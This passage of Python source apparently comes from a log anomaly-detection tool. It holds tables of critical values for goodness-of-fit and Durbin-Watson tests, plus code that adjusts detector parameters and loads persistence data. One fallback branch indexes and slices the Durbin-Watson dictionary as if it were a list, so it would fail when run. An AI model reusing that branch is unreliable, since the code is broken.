200: {'uni': 0.060425411269776755, 'beta1': 0.004629539818339217, 'beta2': 0.33400473721899254, 'beta4': [0.009584650972333094, 1.045076938855807]}, 150: {'uni': 0.07429990877171826, 'beta1': 0.009017861104543, 'beta2': 0.31564503571293595, 'beta4': [0.012220242128090822, 1.047639871284981]}, 100: {'uni': 0.10052225463410921, 'beta1': 0.01956089088384902, 'beta2': 0.36499669372521054, 'beta4': [0.015972577920426997, 1.0341821005789347]}, 75: {'uni': 0.13303851391596935, 'beta1': 0.03598466037575139, 'beta2': 0.4319783884267612, 'beta4': [0.023312914741063458, 1.0320364684089665]}, 50: {'uni': 0.16924151473552013, 'beta1': 0.05098263622341181, 'beta2': 0.47987054682960817, 'beta4': [0.030628113292411226, 1.0253445151693896]}, 30: {'uni': 0.2730853650116837, 'beta1': 0.11958830964796402, 'beta2': 0.5763957024769127, 'beta4': [0.044802580459368586, 1.021053806102985]}, 20: {'uni': 0.34877051560558964, 'beta1': 0.1774726992994486, 'beta2': 0.596517800478609, 'beta4': [0.05608609680158825, 1.0178953367755723]}, 10: {'uni': 0.5382064508681208, 'beta1': 0.34840656929213076, 'beta2': 0.7391836182227792, 'beta4': [0.08303014814835374, 1.0146320825991233]}}, 400: {1000: {'uni': 0.026209806342155622, 'beta1': 0.0012528034498248254, 'beta2': 0.23529367745856108, 'beta4': [0.004320805230985572, 1.112419848894135]}, 750: {'uni': 0.026109204738674938, 'beta1': 0.0015676344082384457, 'beta2': 0.22068244545328733, 'beta4': [0.004474057841167138, 1.094215835056832]}, 500: {'uni': 0.029454600480680656, 'beta1': 0.001397911455226279, 'beta2': 0.24122137931570758, 'beta4': [0.003996336121194239, 1.0858975355177618]}, 400: {'uni': 0.0299979365013004, 'beta1': 0.0016324361130554963, 'beta2': 0.25514254631092853, 'beta4': [0.005012661134952242, 1.075586195091313]}, 300: {'uni': 0.04106239413269716, 'beta1': 0.00265492909809163, 'beta2': 0.2676813799664323, 'beta4': [0.00574872945436531, 1.0777848197004376]}, 200: {'uni': 0.07010191864996612, 'beta1': 0.007739385258328493, 'beta2': 
0.28844627964158687, 'beta4': [0.009606054283202024, 1.0623623041267098]}, 150: {'uni': 0.07548793732876151, 'beta1': 0.007173838150662292, 'beta2': 0.31944202255614057, 'beta4': [0.010475083204453681, 1.0535667495755432]}, 100: {'uni': 0.13012977421092564, 'beta1': 0.01950906919380695, 'beta2': 0.38456733938185056, 'beta4': [0.014565591838886616, 1.0444994537785801]}, 75: {'uni': 0.12879610969461608, 'beta1': 0.03316885761904827, 'beta2': 0.4344096694228591, 'beta4': [0.02186931697757683, 1.0417307188802103]}, 50: {'uni': 0.19587048133869084, 'beta1': 0.06726717689172765, 'beta2': 0.4837317952295418, 'beta4': [0.03044567966820428, 1.0316798043768414]}, 30: {'uni': 0.2885105758490185, 'beta1': 0.09253031031163511, 'beta2': 0.5426595128852456, 'beta4': [0.044357799095975335, 1.0277129264951208]}, 20: {'uni': 0.3423360016646393, 'beta1': 0.15320983210606476, 'beta2': 0.6150709939528051, 'beta4': [0.06269025330982703, 1.0238961558784514]}, 10: {'uni': 0.5638941332248057, 'beta1': 0.34883930616627784, 'beta2': 0.732850978191352, 'beta4': [0.08097781812359789, 1.0183696008339012]}}, 300: {1000: {'uni': 0.03697391950538826, 'beta1': 0.0037587290091272542, 'beta2': 0.2941880452433283, 'beta4': [0.0062970688023370105, 1.140943658481785]}, 750: {'uni': 0.04459852541100737, 'beta1': 0.002386072912073571, 'beta2': 0.2659829977334984, 'beta4': [0.007119765549883499, 1.1206843223162462]}, 500: {'uni': 0.0357683843109935, 'beta1': 0.0027726863173718644, 'beta2': 0.23609524241025398, 'beta4': [0.005949250566485548, 1.1125558721619353]}, 400: {'uni': 0.03435278048786573, 'beta1': 0.002906613367063174, 'beta2': 0.30866043135716725, 'beta4': [0.006143500069286727, 1.1107577665751034]}, 300: {'uni': 0.045849196840483344, 'beta1': 0.004380918345796293, 'beta2': 0.2771671252127634, 'beta4': [0.006634063460291386, 1.087017134330869]}, 200: {'uni': 0.053859418965440456, 'beta1': 0.0062719069457408405, 'beta2': 0.2963923468974883, 'beta4': [0.008099159991741616, 1.0792869480721894]}, 150: 
{'uni': 0.07066337263399719, 'beta1': 0.008736997723679881, 'beta2': 0.3251019472842105, 'beta4': [0.013913289456289137, 1.0683038989936084]}, 100: {'uni': 0.09981841785248288, 'beta1': 0.025440638493153908, 'beta2': 0.3966524688792758, 'beta4': [0.01605404277263024, 1.0652860963007686]}, 75: {'uni': 0.15105316789466477, 'beta1': 0.03915037732452085, 'beta2': 0.41626942092060754, 'beta4': [0.02191579411280009, 1.0523909796365454]}, 50: {'uni': 0.17484256812179605, 'beta1': 0.04497383262749608, 'beta2': 0.45572339594264294, 'beta4': [0.02820511965000463, 1.0452251008842077]}, 30: {'uni': 0.2606590603145417, 'beta1': 0.11969227776465383, 'beta2': 0.5252303693074646, 'beta4': [0.038352104328644714, 1.0348049324704034]}, 20: {'uni': 0.3856413645220924, 'beta1': 0.15140885200484566, 'beta2': 0.6319959664924306, 'beta4': [0.05857015440594212, 1.027654094293965]}, 10: {'uni': 0.5118825279100839, 'beta1': 0.3335710648200135, 'beta2': 0.741387039678667, 'beta4': [0.0859932696959542, 1.024719711098674]}}, 200: {1000: {'uni': 0.05151262491969304, 'beta1': 0.00557100210213531, 'beta2': 0.2668825327634389, 'beta4': [0.010538893374802173, 1.2171655533105397]}, 750: {'uni': 0.05469553492358907, 'beta1': 0.004833789083975562, 'beta2': 0.26489777149823035, 'beta4': [0.010722773184482691, 1.1960517300553821]}, 500: {'uni': 0.04775042790856262, 'beta1': 0.006652995919308116, 'beta2': 0.36021257322332423, 'beta4': [0.008695745069049706, 1.164928412055601]}, 400: {'uni': 0.057334009996901324, 'beta1': 0.004294613400485525, 'beta2': 0.371033028200585, 'beta4': [0.010031180328761704, 1.1501078191012866]}, 300: {'uni': 0.049684597811366665, 'beta1': 0.008499359150427318, 'beta2': 0.29613841935914803, 'beta4': [0.008837488922880181, 1.1231549228365025]}, 200: {'uni': 0.05832825272371185, 'beta1': 0.006697516279795657, 'beta2': 0.39511479851856224, 'beta4': [0.010047397962625848, 1.1181052008643884]}, 150: {'uni': 0.07777153033124701, 'beta1': 0.00900622480430151, 'beta2': 
0.3840383315171673, 'beta4': [0.010868672609946542, 1.1055624437674316]}, 100: {'uni': 0.10446273882750046, 'beta1': 0.023086612022459412, 'beta2': 0.3554307967400825, 'beta4': [0.015850124282086046, 1.095887178493004]}, 75: {'uni': 0.1288379259227677, 'beta1': 0.03193365062395732, 'beta2': 0.41758773246133707, 'beta4': [0.019077099325128966, 1.0819065772828271]}, 50: {'uni': 0.20019589133880328, 'beta1': 0.05460579112418594, 'beta2': 0.4492824362223685, 'beta4': [0.03136538729573724, 1.0634108603370227]}, 30: {'uni': 0.2989964472722316, 'beta1': 0.10790396387551246, 'beta2': 0.518601566315402, 'beta4': [0.04157241281091631, 1.0527079106127977]}, 20: {'uni': 0.37471304310660425, 'beta1': 0.18583949748603418, 'beta2': 0.6021024278440756, 'beta4': [0.05749272265644228, 1.043381326439097]}, 10: {'uni': 0.527570467729745, 'beta1': 0.3603215508845803, 'beta2': 0.7131220771053172, 'beta4': [0.08533707841915919, 1.0350030516769588]}}, 150: {1000: {'uni': 0.07052889039205126, 'beta1': 0.010024200840333964, 'beta2': 0.3083261123837317, 'beta4': [0.013526285671768778, 1.2478637545541533]}, 750: {'uni': 0.0860726015615848, 'beta1': 0.010380529900627569, 'beta2': 0.30599740090325434, 'beta4': [0.012540685650418876, 1.2286531319506213]}, 500: {'uni': 0.0654006630277639, 'beta1': 0.008681664379906905, 'beta2': 0.45441420543986255, 'beta4': [0.011738965264343941, 1.2046107993328228]}, 400: {'uni': 0.07018607099380372, 'beta1': 0.020538750971438955, 'beta2': 0.3401951193202403, 'beta4': [0.010482953670016155, 1.1967410973771544]}, 300: {'uni': 0.07906994258517838, 'beta1': 0.012765196487756798, 'beta2': 0.3473319166630782, 'beta4': [0.012960970621760944, 1.186784276574822]}, 200: {'uni': 0.07687044506402128, 'beta1': 0.009009790251886841, 'beta2': 0.390321852263401, 'beta4': [0.016054629934173753, 1.1614077237409302]}, 150: {'uni': 0.08234029556315943, 'beta1': 0.014170771965552609, 'beta2': 0.32568694785066254, 'beta4': [0.011742895360485154, 1.1450709824504766]}, 100: {'uni': 
0.09851302012310224, 'beta1': 0.016743774531242164, 'beta2': 0.3769412320128021, 'beta4': [0.01637186145008221, 1.1181403582578833]}, 75: {'uni': 0.13159671189369468, 'beta1': 0.0353072844153596, 'beta2': 0.4029701798442491, 'beta4': [0.0242920289946626, 1.1014964463557084]}, 50: {'uni': 0.2082524484431105, 'beta1': 0.058731656498910045, 'beta2': 0.4381324547033927, 'beta4': [0.026849081958434176, 1.0876033182011025]}, 30: {'uni': 0.293617651791125, 'beta1': 0.09264315880887661, 'beta2': 0.5127477095369036, 'beta4': [0.03992448279709234, 1.0738220472794529]}, 20: {'uni': 0.36087329714400185, 'beta1': 0.20900980183336224, 'beta2': 0.5807926264924211, 'beta4': [0.05187077347058253, 1.0620763444007149]}, 10: {'uni': 0.5219501641374265, 'beta1': 0.3551980104060056, 'beta2': 0.7076947393664232, 'beta4': [0.08767917650288747, 1.0483637472236114]}}, 100: {1000: {'uni': 0.09293632608491963, 'beta1': 0.025720520021528075, 'beta2': 0.40252090475367147, 'beta4': [0.020928371822775547, 1.34296320538308]}, 750: {'uni': 0.10604279254769028, 'beta1': 0.03092454484113119, 'beta2': 0.3818717550561334, 'beta4': [0.02453933202150238, 1.342042471316131]}, 500: {'uni': 0.12565818508622995, 'beta1': 0.022377522080934454, 'beta2': 0.3905279161507944, 'beta4': [0.019542928350261425, 1.3078129134604686]}, 400: {'uni': 0.10873296749252183, 'beta1': 0.021194077173698013, 'beta2': 0.40756034730854335, 'beta4': [0.02718956918208252, 1.2942385171370212]}, 300: {'uni': 0.15669346437026238, 'beta1': 0.03142712087537317, 'beta2': 0.43179943146892075, 'beta4': [0.02064917213006419, 1.2667039670988918]}, 200: {'uni': 0.13343635754779815, 'beta1': 0.024233682548692133, 'beta2': 0.41522565490064955, 'beta4': [0.022369515030967926, 1.229891305593201]}, 150: {'uni': 0.11102480689661139, 'beta1': 0.02156285575115978, 'beta2': 0.45645114687990723, 'beta4': [0.01753545868173576, 1.2201162525672415]}, 100: {'uni': 0.11113330260703609, 'beta1': 0.025608870599415502, 'beta2': 0.48352061272931374, 'beta4': 
[0.020850521302083376, 1.1960117094042504]}, 75: {'uni': 0.1468788764521182, 'beta1': 0.0265797908677119, 'beta2': 0.5095270313141985, 'beta4': [0.021404540631677776, 1.1660210148862071]}, 50: {'uni': 0.21504666655802165, 'beta1': 0.0489536361147554, 'beta2': 0.45594457855380627, 'beta4': [0.027095564600229022, 1.145224577518587]}, 30: {'uni': 0.28088203482754814, 'beta1': 0.10794487397895774, 'beta2': 0.5169455155470948, 'beta4': [0.042544039097420154, 1.1110310777960173]}, 20: {'uni': 0.3554362219541707, 'beta1': 0.14189026695845378, 'beta2': 0.5830537392316464, 'beta4': [0.056849867105273504, 1.0955705395949151]}, 10: {'uni': 0.5379842252559748, 'beta1': 0.3322804773023954, 'beta2': 0.6932018848300567, 'beta4': [0.08316172640718857, 1.0796082756736676]}}, 75: {1000: {'uni': 0.17532266769625532, 'beta1': 0.03705383020682054, 'beta2': 0.4980809003523, 'beta4': [0.026908987077822855, 1.479626079300446]}, 750: {'uni': 0.17675406910394137, 'beta1': 0.038950169506359156, 'beta2': 0.5358765381219652, 'beta4': [0.029789208608383192, 1.4458845611717743]}, 500: {'uni': 0.1745341229104289, 'beta1': 0.03502152451732104, 'beta2': 0.5015222005427495, 'beta4': [0.02661668897015479, 1.4148626116690979]}, 400: {'uni': 0.1881709766845352, 'beta1': 0.03266767818661956, 'beta2': 0.5294529369416701, 'beta4': [0.02895499025416707, 1.3854046773623654]}, 300: {'uni': 0.13841231000540105, 'beta1': 0.040099804822498177, 'beta2': 0.4996511962838116, 'beta4': [0.026756867634909184, 1.3802282341024599]}, 200: {'uni': 0.2366476167578417, 'beta1': 0.03552681627168437, 'beta2': 0.5607067863598236, 'beta4': [0.03323654149531536, 1.2735668785729228]}, 150: {'uni': 0.18246201015916463, 'beta1': 0.03018835273992427, 'beta2': 0.5001788380781702, 'beta4': [0.025060717431827743, 1.2546678580100472]}, 100: {'uni': 0.15047393862146116, 'beta1': 0.04053535855173776, 'beta2': 0.4812632826392785, 'beta4': [0.026154101723556197, 1.2327049090106668]}, 75: {'uni': 0.15012891413727075, 'beta1': 
0.02909973108408468, 'beta2': 0.49374882961313393, 'beta4': [0.02312183625600833, 1.2116456107592724]}, 50: {'uni': 0.19863871412617307, 'beta1': 0.06609371552014234, 'beta2': 0.6567166295934954, 'beta4': [0.03296979599917632, 1.2550373634574192]}, 30: {'uni': 0.2550047584775841, 'beta1': 0.11172494481560213, 'beta2': 0.5074928992715775, 'beta4': [0.043521196438275414, 1.1350283218684674]}, 20: {'uni': 0.35838253867057834, 'beta1': 0.16187358221610643, 'beta2': 0.5897253293496353, 'beta4': [0.05534786787218656, 1.1279915725089584]}, 10: {'uni': 0.5150122800236072, 'beta1': 0.3557051324372316, 'beta2': 0.6880298753534303, 'beta4': [0.09054643254841971, 1.103946091144453]}}, 50: {1000: {'uni': 0.2650056267046456, 'beta1': 0.08166412797304853, 'beta2': 0.5945214491866839, 'beta4': [0.04097953842977647, 1.8013173549302084]}, 750: {'uni': 0.24155189502911895, 'beta1': 0.10245354397196359, 'beta2': 0.6330919397034261, 'beta4': [0.034894476175374486, 1.650125217907123]}, 500: {'uni': 0.22696308147232963, 'beta1': 0.0679737190879648, 'beta2': 0.6138878557879524, 'beta4': [0.03566096720674545, 1.6223000589486727]}, 400: {'uni': 0.33396981679697424, 'beta1': 0.0706793112232333, 'beta2': 0.7113457702884565, 'beta4': [0.03723609953854181, 1.515912197850878]}, 300: {'uni': 0.2294437752492345, 'beta1': 0.10300859222087975, 'beta2': 0.624203244880632, 'beta4': [0.03555120916901846, 1.4723487637131012]}, 200: {'uni': 0.23606764222426072, 'beta1': 0.0596235427426007, 'beta2': 0.6485710881348021, 'beta4': [0.03546895329039058, 1.4690637171977303]}, 150: {'uni': 0.24971083019799395, 'beta1': 0.08173419251816907, 'beta2': 0.6412527594047174, 'beta4': [0.03080052698601413, 1.400646947726267]}, 100: {'uni': 0.24073055018989464, 'beta1': 0.08393118651040495, 'beta2': 0.6318891921522501, 'beta4': [0.033365155212361386, 1.3928918785590392]}, 75: {'uni': 0.20486837629924928, 'beta1': 0.07832186899428449, 'beta2': 0.9281761107775478, 'beta4': [0.035445164112972466, 1.359740664152222]}, 50: 
{'uni': 0.31302104786432344, 'beta1': 0.06958866399568142, 'beta2': 0.6675066174467515, 'beta4': [0.04004874980800829, 1.3013016016398449]}, 30: {'uni': 0.3000620157287262, 'beta1': 0.10185267251225222, 'beta2': 0.5982970610321356, 'beta4': [0.04582850492651095, 1.2269146691004775]}, 20: {'uni': 0.3277234906176977, 'beta1': 0.17678051119760746, 'beta2': 0.80877510160582, 'beta4': [0.055374219831087326, 1.182345614556768]}, 10: {'uni': 0.5486887840452432, 'beta1': 0.33752085706590534, 'beta2': 0.9783712560936997, 'beta4': [0.08769564811462487, 1.1728320174796847]}}, 30: {1000: {'uni': 0.4718938205689787, 'beta1': 0.16850220491415746, 'beta2': 0.8146723863376911, 'beta4': [0.060273300232967286, 2.0988712699699263]}, 750: {'uni': 0.5018440993649246, 'beta1': 0.17087313652020972, 'beta2': 0.9139854538013207, 'beta4': [0.06558390958546415, 1.9685729528057976]}, 500: {'uni': 0.4550074651154489, 'beta1': 0.28720847796868054, 'beta2': 0.9452586563341621, 'beta4': [0.05890745674834778, 1.8754248251081465]}, 400: {'uni': 0.436712873445179, 'beta1': 0.19309724802712522, 'beta2': 0.8305072281593623, 'beta4': [0.07639496690376428, 1.8192427800816744]}, 300: {'uni': 0.4038782023707537, 'beta1': 0.21954095996677023, 'beta2': 1.0495495612649217, 'beta4': [0.086287115068548, 1.8253687511907974]}, 200: {'uni': 0.40958440685368225, 'beta1': 0.2777249767350044, 'beta2': 0.8707654031176021, 'beta4': [0.05316017846802162, 1.9337123485717123]}, 150: {'uni': 0.48726972984551553, 'beta1': 0.2808145117204757, 'beta2': 0.7712993996707392, 'beta4': [0.06855307088907785, 1.6668462866585527]}, 100: {'uni': 0.4200145205606179, 'beta1': 0.2606601028231352, 'beta2': 0.9232966743931794, 'beta4': [0.05814323640662995, 1.6078579676603513]}, 75: {'uni': 0.39519545172731607, 'beta1': 0.22617403736893438, 'beta2': 0.890799391826426, 'beta4': [0.054127227539886885, 1.560768803789716]}, 50: {'uni': 0.39025281852797566, 'beta1': 0.23363888472905656, 'beta2': 1.2303662537657782, 'beta4': 
[0.06300398028876605, 1.4559351506605223]}, 30: {'uni': 0.44358611593337394, 'beta1': 0.26124311609935197, 'beta2': 0.9784487439751727, 'beta4': [0.06612661331709933, 1.392222289383322]}, 20: {'uni': 0.5347291476681059, 'beta1': 0.27747940739842103, 'beta2': 0.9266746270833626, 'beta4': [0.06610539815659515, 1.32312648428402]}, 10: {'uni': 0.5268518049779942, 'beta1': 0.3857529731825581, 'beta2': 1.1001485562440783, 'beta4': [0.08788647848700928, 1.2844856774978703]}}, 20: {1000: {'uni': 0.611616820756745, 'beta1': 0.6103466151158652, 'beta2': 1.606833963804752, 'beta4': [0.09884033613550786, 2.1456400777366262]}, 750: {'uni': 0.8441808990110113, 'beta1': 0.655796713372086, 'beta2': 1.3506490733719665, 'beta4': [0.08853624853950347, 2.43866677610598]}, 500: {'uni': 0.5988373577646251, 'beta1': 0.46186085630032825, 'beta2': 1.1443828909845946, 'beta4': [0.0898461305276427, 2.2698199759166293]}, 400: {'uni': 0.8304510322484031, 'beta1': 0.5653414175451948, 'beta2': 1.0996186027703847, 'beta4': [0.08571539158958671, 3.387955591663139]}, 300: {'uni': 0.7442187522594172, 'beta1': 0.46331401253974935, 'beta2': 1.3717790709655808, 'beta4': [0.08555870911414092, 2.2166475986530325]}, 200: {'uni': 0.5840315022363041, 'beta1': 0.500364751905612, 'beta2': 1.4769988218033934, 'beta4': [0.08329354644891862, 2.1254438240050932]}, 150: {'uni': 0.7370906650368898, 'beta1': 0.4300463168971484, 'beta2': 1.3485978764788007, 'beta4': [0.09303457801455614, 2.2267612097524974]}, 100: {'uni': 0.6956826951091755, 'beta1': 0.5470576578153282, 'beta2': 1.2950746340437869, 'beta4': [0.085475813042166, 2.138973908107944]}, 75: {'uni': 0.6315552620464701, 'beta1': 0.45366873570471705, 'beta2': 1.1868079151662958, 'beta4': [0.08610644280569565, 2.003073434601368]}, 50: {'uni': 0.7697854387023668, 'beta1': 0.6507738597857059, 'beta2': 1.2659839239789354, 'beta4': [0.1046390254645072, 1.8724398846396764]}, 30: {'uni': 0.6306465749354568, 'beta1': 0.3466779009755018, 'beta2': 1.4822578201869108, 
'beta4': [0.07745622301179714, 1.657048978669253]}, 20: {'uni': 0.8379018121518431, 'beta1': 0.4723776520325354, 'beta2': 1.2850268089384693, 'beta4': [0.08284590089109896, 1.6388492255583167]}, 10: {'uni': 0.8026106812614728, 'beta1': 0.8119190556003473, 'beta2': 1.2439818501783644, 'beta4': [0.085265760399476, 1.5405846754306889]}}, 10: {1000: {'uni': 2.3606969805461206, 'beta1': 8.291393251934911, 'beta2': 3.0820553912299253, 'beta4': [0.17737760558981158, 4.722276247639879]}, 750: {'uni': 2.6243276289156463, 'beta1': 2.7438030102193163, 'beta2': 3.9683799500049672, 'beta4': [0.17895578288402622, 4.083319167546689]}, 500: {'uni': 3.0871922423026548, 'beta1': 3.0328915004201407, 'beta2': 2.4964791662617336, 'beta4': [0.18355309506899545, 4.031756561717203]}, 400: {'uni': 1.6754252980305366, 'beta1': 2.924592003149563, 'beta2': 2.876497968109593, 'beta4': [0.20379870214850968, 4.7571034917708745]}, 300: {'uni': 2.2840468336952258, 'beta1': 2.5053743801906627, 'beta2': 2.783976562174647, 'beta4': [0.1674565791702932, 4.251642426694717]}, 200: {'uni': 1.9404428681304904, 'beta1': 2.5953221685871517, 'beta2': 2.7845173800545835, 'beta4': [0.18871911293484883, 3.741857968949452]}, 150: {'uni': 2.2704248546155794, 'beta1': 2.5329844830991, 'beta2': 2.9321247060942506, 'beta4': [0.19544767471408223, 4.336291651767806]}, 100: {'uni': 1.7356265048063002, 'beta1': 2.688039772684837, 'beta2': 4.461312176712382, 'beta4': [0.2144202268455395, 3.7766159615531025]}, 75: {'uni': 2.801004734921743, 'beta1': 2.464893798760152, 'beta2': 3.0067071540322545, 'beta4': [0.15188724806910345, 3.526991789646563]}, 50: {'uni': 2.0977009172862875, 'beta1': 2.7445624040074015, 'beta2': 2.765481175145812, 'beta4': [0.18755095945550393, 3.344866076834204]}, 30: {'uni': 2.880255284937104, 'beta1': 3.0321147833640745, 'beta2': 2.8449557765079883, 'beta4': [0.17623333533835164, 2.790174609633874]}, 20: {'uni': 1.9749893632036886, 'beta1': 2.776680410526643, 'beta2': 2.333479763453262, 'beta4': 
[0.17125301578097318, 2.713705409440226]}, 10: {'uni': 1.769735529651201, 'beta1': 2.0654589693702543, 'beta2': 2.084703780638172, 'beta4': [0.1690462952550446, 2.275840335334111]}}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update steps for the CM-homogeneity test self.crit_val_hom_cm = {0.05: {1000: {1000: 250.45790499999998, 750: 214.76505847619046, 500: 167.13765355555554, 400: 143.34140714285715, 300: 115.84368512820512, 200: 83.78856944444445, 150: 65.64008811594204, 100: 45.92995272727273, 75: 35.333255503875975, 50: 24.20186603174603, 30: 15.071306472491909, 20: 10.300656209150326, 10: 5.412521782178217}, 750: {750: 187.94798666666668, 500: 150.45562666666666, 400: 130.8715215942029, 300: 107.59431746031746, 200: 79.42039298245614, 150: 62.92309481481481, 100: 44.59799294117647, 75: 34.55483636363636, 50: 23.878958333333333, 30: 14.859858119658119, 20: 10.21919393939394, 10: 5.402328070175439}, 500: {500: 125.503068, 400: 111.5444314814815, 300: 94.26128, 200: 71.8865042857143, 150: 58.17430564102565, 100: 42.119102222222224, 75: 33.121080579710146, 50: 23.146869090909092, 30: 14.620633962264153, 20: 10.067361538461538, 10: 5.362602614379085}, 400: {400: 100.46720625, 300: 86.17663333333333, 200: 67.12748888888889, 150: 55.01036818181819, 100: 40.436935, 75: 32.00267719298246, 50: 22.691451851851852, 30: 14.409891472868217, 20: 9.963246031746031, 10: 5.314048780487806}, 300: {300: 75.4713888888889, 200: 60.46678, 150: 50.42997037037037, 100: 37.9633, 75: 30.453804444444447, 50: 21.899904761904764, 30: 14.075888888888887, 20: 9.838104166666666, 10: 5.271225806451613}, 200: {200: 50.458725, 150: 43.26386190476191, 100: 33.81099444444445, 75: 27.704703030303033, 50: 20.47892, 30: 13.505202898550726, 20: 9.538204545454546, 10: 5.192849206349207}, 150: {150: 37.93966666666667, 100: 30.43725333333333, 75: 
25.45431111111111, 50: 19.195833333333333, 30: 12.965740740740742, 20: 9.288392156862745, 10: 5.1022083333333335}, 100: {100: 25.4654, 75: 21.866933333333332, 50: 17.144955555555555, 30: 12.011923076923077, 20: 8.791944444444445, 10: 5.000454545454545}, 75: {75: 19.179288888888887, 50: 15.485066666666667, 30: 11.208, 20: 8.371368421052633, 10: 4.864470588235294}, 50: {50: 13.005400000000002, 30: 9.881416666666667, 20: 7.576285714285715, 10: 4.6065555555555555}, 30: {30: 7.982777777777779, 20: 6.457666666666666, 10: 4.179166666666666}, 20: {20: 5.442500000000001, 10: 3.7661111111111114}, 10: {10: 2.925}}} # skipcq: FLK-E231, FLK-E501 # List of the critical values of the durbin watson test self.crit_val_dw = {0.01: {1000: 1.855, 750: 1.833, 500: 1.797, 400: 1.773, 300: 1.739, 200: 1.684, 150: 1.637, 100: 1.562, 75: 1.501, 50: 1.403, 30: 1.264, 20: 1.147, 10: 1.001}, # skipcq: FLK-E501 0.05: {1000: 1.898, 750: 1.883, 500: 1.857, 400: 1.841, 300: 1.817, 200: 1.779, 150: 1.747, 100: 1.694, 75: 1.652, 50: 1.585, 30: 1.489, 20: 1.411, 10: 1.320}} # skipcq: FLK-E501 if self.dw_alpha not in self.crit_val_dw: pos_vals = list(self.crit_val_dw.keys()) nearest = self.crit_val_dw[0] for val in self.crit_val_dw[1:]: if abs(self.dw_alpha - val) < abs(self.dw_alpha - nearest): nearest = val msg = f'Changed the parameter dw_alpha of the VTD from {self.dw_alpha} to {nearest} to use the pregenerated critical values ' \ f'for the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.dw_alpha = nearest if num_init not in self.crit_val_dw[self.dw_alpha]: pos_vals = list(self.crit_val_dw[self.dw_alpha].keys()) nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for ' \ f'the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, 
file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (gof_alpha not in self.crit_val_ini_ks or gof_alpha not in self.crit_val_upd_ks)) or ( self.used_gof_test == 'CM' and (gof_alpha not in self.crit_val_ini_cm or gof_alpha not in self.crit_val_upd_cm or gof_alpha not in self.crit_val_hom_cm)): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks if val in self.crit_val_upd_ks] else: pos_vals = [val for val in self.crit_val_ini_cm if val in self.crit_val_upd_cm and val in self.crit_val_hom_cm] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(self.gof_alpha - val) < abs(self.gof_alpha - nearest): nearest = val msg = f'Changed the parameter gof_alpha of the VTD from {self.gof_alpha} to {nearest} to use the pregenerated critical ' \ f'values for the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.gof_alpha = nearest if (self.used_gof_test == 'KS' and (num_init not in self.crit_val_ini_ks[self.gof_alpha] or num_init not in self.crit_val_upd_ks[self.gof_alpha])) or ( self.used_gof_test == 'CM' and (num_init not in self.crit_val_ini_cm[self.gof_alpha] or num_init not in self.crit_val_upd_cm[self.gof_alpha] or num_init not in self.crit_val_hom_cm[self.gof_alpha])): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks[self.gof_alpha] if val in self.crit_val_upd_ks[self.gof_alpha]] else: pos_vals = [val for val in self.crit_val_ini_cm[self.gof_alpha] if val in self.crit_val_upd_cm[self.gof_alpha] and val in self.crit_val_hom_cm[self.gof_alpha]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for' \ f' the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and 
(num_s_gof_values not in self.crit_val_upd_ks[self.gof_alpha][self.num_init])) or ( self.used_gof_test == 'CM' and (num_s_gof_values not in self.crit_val_upd_cm[self.gof_alpha][self.num_init] or num_s_gof_values not in self.crit_val_hom_cm[self.gof_alpha][self.num_init])): if self.used_gof_test == 'KS': pos_vals = list(self.crit_val_upd_ks[self.gof_alpha][self.num_init].keys()) else: pos_vals = [val for val in self.crit_val_upd_cm[self.gof_alpha][self.num_init] if val in self.crit_val_hom_cm[self.gof_alpha][self.num_init]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_s_gof_values - val) < abs(num_s_gof_values - nearest): nearest = val msg = f'Changed the parameter num_s_gof_values of the VTD from {num_s_gof_values} to {nearest} to use pregenerated ' \ f'critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_s_gof_values = nearest # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(self.num_init, self.num_update, num_s_gof_values)} to use pregenerated critical values for the VTDs gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values) + 500: msg = f'Changed the parameter max_num_vals of 
the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(self.num_init, self.num_update, self.num_s_gof_values) + 500} to use pregenerated critical values for the VTDs' \ f' gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) + 500 # Loads the persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if persistence_data is not None: self.load_persistence_data(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__) # Generate the modifiers for the estimation of the minimum and maximum for the 